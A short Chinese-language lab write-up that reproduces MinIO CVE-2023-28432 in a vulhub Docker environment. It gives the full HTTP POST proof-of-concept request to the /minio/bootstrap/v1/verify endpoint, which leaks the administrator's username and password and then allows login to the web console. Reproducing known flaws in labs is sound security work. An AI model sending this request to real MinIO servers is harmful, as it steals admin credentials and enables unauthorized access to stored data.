环境
vulhub一键搭建
cd vulhub/minio/CVE-2023-28432
docker-compose up -d
漏洞复现
访问http://ip:9001Web管理页面,访问http://ip:9000是API服务
这个漏洞在api节点http://ip:9000/minio/bootstrap/v1/verify上
poc
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
结果
可以查看到管理员的账号,密码
使用账号密码在http://ip:9001页面进行登录,能进入后台